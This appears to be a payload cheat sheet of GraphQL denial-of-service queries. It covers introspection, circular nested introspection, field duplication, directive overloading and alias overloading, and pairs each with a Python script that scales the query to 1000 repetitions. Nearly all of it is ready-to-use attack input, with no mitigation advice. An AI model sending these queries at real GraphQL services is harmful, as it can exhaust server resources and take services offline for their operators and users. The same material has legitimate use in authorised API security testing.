GraphQL DOS Cases
GraphQL Introspection Enabled Query
{"query": "query { __schema { types { name fields { name } } } }"}
GraphQL Introspection-based Circular DOS Query
{"query": "query { __schema { types { fields { type { fields { type { fields { type { fields { type { name } } } } } } } } } } }"}
Query Creator for Introspection-based Circular:
# Initialize the base text and the number of repetitions
base_text = "fields { type {"
end_text = "}}"
repetitions = 1000
# Create the result string by repeating the pattern
result = "__schema { types { " + (base_text * repetitions) + " name " + (end_text * repetitions) + " }"
# Print the result string
print(result)
GraphQL Field Duplication DOS Query-1
{"query": "query { __typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n__typename \n} "}
Query Creator for Field Duplication:
text = "__typename \\n"
repetitions = 1000
# Create the result string by repeating the text with a space as separator
result = (text + " ") * repetitions
# Print the result string
print(result)
GraphQL Directives Overloading DOS Query-1
{"query": "query { __typename @aa@aa@aa@aa@aa@aa@aa@aa@aa@aa}"}
Query Creator for Directives Overloading:
# Initialize the text and the number of repetitions
text = "@aa"
repetitions = 1000
# Create the result string by repeating the text
result = text * repetitions
# Print the result string
print(result)
GraphQL Alias Overloading DOS Query-1
{"query": "query { alias0:__typename \nalias1:__typename \nalias2:__typename \nalias3:__typename \nalias4:__typename \nalias5:__typename \nalias6:__typename \nalias7:__typename \nalias8:__typename \nalias9:__typename \nalias10:__typename \nalias11:__typename \nalias12:__typename \nalias13:__typename \nalias14:__typename \nalias15:__typename \nalias16:__typename \nalias17:__typename \nalias18:__typename \nalias19:__typename \nalias20:__typename \nalias21:__typename \nalias22:__typename \nalias23:__typename \nalias24:__typename \n}"}
Query Creator for Alias Overloading:
# Initialize the result string
result = ""
# Loop from 0 to 999 to generate aliases
for i in range(1000):
result += f"alias{i}:__typename \\n"
# Print the result string
print(result)
uceka 